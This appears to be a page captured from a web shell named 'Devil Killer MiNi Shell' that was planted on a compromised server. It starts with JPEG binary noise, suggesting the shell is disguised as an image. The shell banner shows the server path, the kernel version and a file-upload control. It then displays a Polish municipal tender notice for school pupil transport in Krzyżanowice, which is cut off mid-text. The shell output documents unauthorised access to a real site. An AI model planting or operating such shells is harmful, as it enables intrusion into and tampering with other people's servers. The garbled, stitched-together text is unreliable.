JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220623/0022159301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowóz uczniów z terenu Gminy Krzyżanowice do placówek oświatowych w roku szkolnym 2022/2023” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Krzyżanowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258440</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Główna 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krzyżanowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(+48) 324194050</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(+48) 324194234</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@krzyzanowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.krzyzanowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowóz uczniów z terenu Gminy Krzyżanowice do placówek oświatowych w roku szkolnym 2022/2023” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c0a9ee95-f220-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00221593</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00028469/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowóz uczniów do placówek oświatowych w roku szkolnym 2022/2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.krzyzanowice.pl https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl, ePUAP:ugkrzyzanowice/skrytka, email:zamowienia@krzyzanowice.pl, zamowienia1@krzyzanowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym, a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2019 r. poz. 123 i 730).<br/>2)	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 i ust. 5 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt1. Ofertę, a także oświadczenia składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>3)	Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują droga elektroniczną za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP postępowania).<br/>4)	Komunikacja pomiędzy Zamawiającym a Wykonawcami (nie dotyczy składania ofert i wniosków) może również odbywać się za pomocą poczty elektronicznej ePUAP ugkrzyzanowice/skrytka,email:zamowienia1@krzyzanowice.pl, zamowienia@krzyzanowice.pl <br/>5)	Osobą uprawnioną do porozumiewania się z Wykonawcami jest:<br/>-Marta Saczka, pok. nr.13 w godz. 700 – 1500 zamowienia@krzyzanowice.pl.<br/>-Aurelia Wojak, pok. nr.13 w godz. 700 – 1500 zamowienia1@krzyzanowice.pl.<br/>6)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”<br/>7)	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>Regulamin korzystania z miniPortalu jest zawarty: https://miniportal.uzp.gov.pl/WarunkiUslugi<br/>8)	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. <br/>9)	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. <br/>10)	Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania. <br/>11)	W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>-administratorem Pani/Pana danych osobowych jest Wójt Gminy Krzyżanowice ul. Główna 5 47-450 Krzyżanowice tel. 32 419 40 50;<br/>-administrator – Wójt Gminy Krzyżanowice wyznaczył Inspektora Ochrony Danych, z którym można skontaktować się za pomocą poczty elektronicznej: iodo@krzyzanowice.pl ;<br/>-Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Dowóz uczniów z terenu Gminy Krzyżanowice do placówek oświatowych w roku szkolnym 2022/2023” prowadzonym w trybie podstawowym na podstawie art. 275 pkt 1 ustawy PZP;<br/>-odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz.U. z 2021 r. poz. 1129) dalej „ustawa Pzp”; <br/>-Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>-obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>-w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>-posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>-nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Gp-Zp.271.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem I części zamówienia jest usługa polegająca na dowozie uczniów zamieszkałych <br/>na terenie Gminy Krzyżanowice do szkół podstawowych znajdujących się na terenie gminy oraz ich odwozie w roku szkolnym 2022/2023 – około 188 uczniów w skali miesiąca, w oparciu o zakupione bilety miesięczne dla każdego ucznia. Przewidywana liczba uczniów w skali miesiąca, odpowiadająca ilość biletów miesięcznych, ma charakter prognozowany i może ulec zmianie. <br/>2)	Wykonawca umożliwi Zamawiającemu odchylenie od przewidywanej liczby uczniów w skali miesiąca o co najmniej 10 % co stanowi 19 uczniów w dół i w górę, co odpowiada ilość biletów miesięcznych. Wskazaną tolerancję należy rozumieć jako prawo opcji, ustalone przez Zamawiającego w rozumieniu zapisów art. 441 ust 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, (t.j. Dz.U. z 2021 r. poz. 1129), zgodnie z którym minimalna liczba uczniów do przewozu wynosi 169 uczniów, a maksymalna wynosi 207 uczniów. Taka zmiana ilości uczniów w trakcie realizacji umowy będzie odpowiadać faktycznej ilości biletów i nie będzie stanowić podstawy do wnoszenia roszczeń przez Wykonawcę, w toku realizacji umowy.<br/>3)	Dowóz uczniów do szkół na terenie Gminy Krzyżanowice w roku szkolnym 2022/2023 zgodnie z przewidzianym kalendarzem, począwszy od 01.09.2022 r. do 23.06.2023 r. obejmuje dowóz wg prognoz:<br/>a)	ok. 7 uczniów: z Rudyszwałdu (5) i Zabełkowa (2) do Szkoły Podstawowej w Chałupkach, ul. Szkolna 7, 47-460 Chałupki,<br/>b)	ok. 23 uczniów: z Rudyszwałdu (20) i Chałupek (3) do Zespołu Szkolno-Przedszkolnego <br/>w Zabełkowie, ul. Rymera 7, 47-460 Zabełków,<br/>c)	ok. 116 uczniów: z Owsiszcz (48), Nowej Wioski (31), Roszkowa (37) do Szkoły Podstawowej w Krzyżanowicach, ul. Łąkowa 12, 47-450 Krzyżanowice,<br/>d)	ok. 42 uczniów: z Bolesławia (37), Krzyżanowic (4) i Tworkowa (1) do Szkoły Podstawowej <br/>w Bieńkowicach, ul. Szkolna 1, 47-451 Bieńkowice.<br/>4)	Bilety miesięczne wystawiane będą przez Wykonawcę na podstawie otrzymanej od Dyrektorów w/w jednostek oświatowych co miesięcznej imiennej listy uczniów uprawnionych do dowozu w następnym miesiącu, najpóźniej na 2 dni przed rozpoczęciem tego miesiąca. Przez bilet miesięczny rozumie się uśredniony (niezależnie od rodzaju trasy) koszt dowozu jednego ucznia z miejscowości zamieszkania na terenie Gminy Krzyżanowice pod adres szkoły podany powyżej oraz powrotu ze szkoły do miejsc ustalonych w poszczególnych miejscowościach.<br/>5)	Przejazdy autobusów powinny być zorganizowane na ww. trasach w taki sposób, aby zapewnić:<br/>a)	codzienne dotarcie uczniów do szkoły w dni nauki szkolnej przed rozpoczęciem zajęć lekcyjnych, w roku szkolnym 2022/2023 począwszy od 01.09.2022 r. do 23.06.2023 r.<br/>b)	codzienny powrót uczniów ze szkół w dni nauki szkolnej, po skończeniu 5-lekcji, 6-lekcji, 7-lekcji lub 8-lekcji wg. zakończenia godzin lekcyjnych w poszczególnych placówkach, tj.:<br/>-SP Chałupki – odjazdy: ok. 13:37; ok. 15:22;<br/>-ZSP Zabełków – odjazdy: ok. 13:30; ok.15:11;<br/>-SP Krzyżanowice – odjazdy: ok.13:35, ok. 14:40 – do Roszkowa; <br/> ok. 13:15, ok.14:10 – do Owsiszcz i Nowej Wioski; <br/> ok. 15:40 – do Roszkowa, Owsiszcz i Nowej Wioski;<br/>-SP Bieńkowice – odjazdy: ok.13.38; ok. 15.24.<br/>c)	Ostateczne godziny przyjazdów i odjazdów autobusów należy uzgadniać na bieżąco<br/>z Dyrektorami placówek oświatowych do których będą dowożeni uczniowie. <br/>6)	Świadczenie usług winno odbywać się na profesjonalnym poziomie i powinno w pełni zaspokajać potrzeby Zamawiającego.<br/>7)	Wykonawca winien zapewnić wszystkim uczniom przewóz podczas wszystkich kursów, w dniach, w których odbywają się zajęcia szkolne a także uruchomić dodatkowe kursy celem rozładowania przepełnienia w autobusach.<br/>8)	Wykonawca zapewni bezpłatny bilet miesięczny (lub kartę przejazdu) dla wyznaczonych przez Zamawiającego opiekunów – po jednym na każdej trasie.<br/>9)	Wykonawca zapewni tabor autobusowy w ilości odpowiadającej zakresowi wymaganej usług, który powinien być sprawny i winien posiadać aktualne badanie techniczne, oraz zagwarantuje w razie każdorazowej awarii autobusu transport zastępczy, który będzie podstawiony w czasie nie dłuższym niż 60 minut od wystąpienia awarii. Autobusy powinny spełniać wszystkie wymagania przewidziane prawem w tym podstawowe warunki sanitarno-higieniczne. Zamawiający zastrzega sobie prawo do sprawdzenia stanu technicznego pojazdów oraz kwalifikacji osób - kierowcy. Pojazdy przewożące uczniów nie mogą zabierać innych osób bez zgody Zamawiającego.<br/>10)	W przypadku odmiennej organizacji pracy szkoły i skrócenia zajęć lekcyjnych np. w dni rekolekcji, w dni sprawdzianów i egzaminów zewnętrznych, sprzątania świata, itp. Wykonawca zapewni odwóz uczniów we wcześniejszych godzinach ustalonych z Zamawiającym. Zmieniona organizacja odwozów nie stanowi dodatkowych zadań, należy ją wkalkulować w cenę ryczałtową biletu.<br/>11)	W okresie występowania na terytorium RP stanu zagrożenia epidemicznego lub stanu epidemii lub innego o podobnym skutku Wykonawca zobowiązany jest do przestrzegania obowiązującego reżimu sanitarnego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Przedmiotem I części zamówienia jest usługa polegająca na dowozie uczniów zamieszkałych <br/>na terenie Gminy Krzyżanowice do szkół podstawowych znajdujących się na terenie gminy oraz ich odwozie w roku szkolnym 2022/2023 – około 188 uczniów w skali miesiąca, w oparciu o zakupione bilety miesięczne dla każdego ucznia. Przewidywana liczba uczniów w skali miesiąca, odpowiadająca ilość biletów miesięcznych, ma charakter prognozowany i może ulec zmianie. <br/>2)	Wykonawca umożliwi Zamawiającemu odchylenie od przewidywanej liczby uczniów w skali miesiąca o co najmniej 10 % co stanowi 19 uczniów w dół i w górę, co odpowiada ilość biletów miesięcznych. Wskazaną tolerancję należy rozumieć jako prawo opcji, ustalone przez Zamawiającego w rozumieniu zapisów art. 441 ust 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, (t.j. Dz.U. z 2021 r. poz. 1129), zgodnie z którym minimalna liczba uczniów do przewozu wynosi 169 uczniów, a maksymalna wynosi 207 uczniów. Taka zmiana ilości uczniów w trakcie realizacji umowy będzie odpowiadać faktycznej ilości biletów i nie będzie stanowić podstawy do wnoszenia roszczeń przez Wykonawcę, w toku realizacji umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ofertą najkorzystniejszą zostanie wybrana ta oferta, która otrzyma łącznie najwyższą ilość punktów w kryterium cena brutto 1 biletu miesięcznego i czas podstawienia pojazdu zastępczego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem II części zamówienia jest usługa polegająca na:<br/>a)	dowozie ok 18 uczniów niepełnosprawnych z terenu Gminy Krzyżanowice do placówek oświatowych na terenie Powiatu Raciborskiego oraz ich odwozie w roku szkolnym 2022/2023, w dniach nauki szkolnej odliczając przerwy świąteczne i ferie zimowe - około 188 dni w zaplanowanym okresie, począwszy od 01.09.2022 r. do 23.06.2023 r. Faktyczna ilości dni nauki szkolnej będzie wynikać z ilości dni dowozu dzieci niepełnosprawnych, przedstawionych przez Wykonawcę w wykazach dni załączonych do faktur miesięcznych i zweryfikowanych przez Zamawiającego.<br/>Przewidywana liczba uczniów, w skali miesiąca ma charakter prognozowany i może ulec zmianie. Wykonawca umożliwi Zamawiającemu bezkosztowe odchylenie od przewidywanej ilości uczniów o co najmniej 10 % - 2 uczniów (w dół i w górę). Wskazaną tolerancję należy rozumieć jako prawo opcji, ustalone przez Zamawiającego w rozumieniu zapisów art. 441 ust 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, (t.j. Dz.U. z 2021 r. poz. 1129) zgodnie z którym minimalna liczba uczniów niepełnosprawnych do przewozu wynosi 16 uczniów, a maksymalna wynosi 20 uczniów. <br/>W związku z miesięcznym wynagrodzeniem ryczałtowym za ilość uczniów przewożonych w miesiącu, taka zmiana ilości uczniów w trakcie roku szkolnego nie będzie stanowić podstawy do wnoszenia roszczeń przez Wykonawcę, co do ilości faktycznie dowożonych dzieci w toku realizacji umowy. W związku z tym Wykonawca winien zapewnić w pojazdach miejsca siedzące wyposażone w pasy bezpieczeństwa, służące do przewozu 20 uczniów niepełnosprawnych wraz z opiekunem - ilość odpowiadająca maksymalnej ilości uczniów wynikających z prawa opcji. <br/>Dowóz uczniów do szkół z terenu Gminy 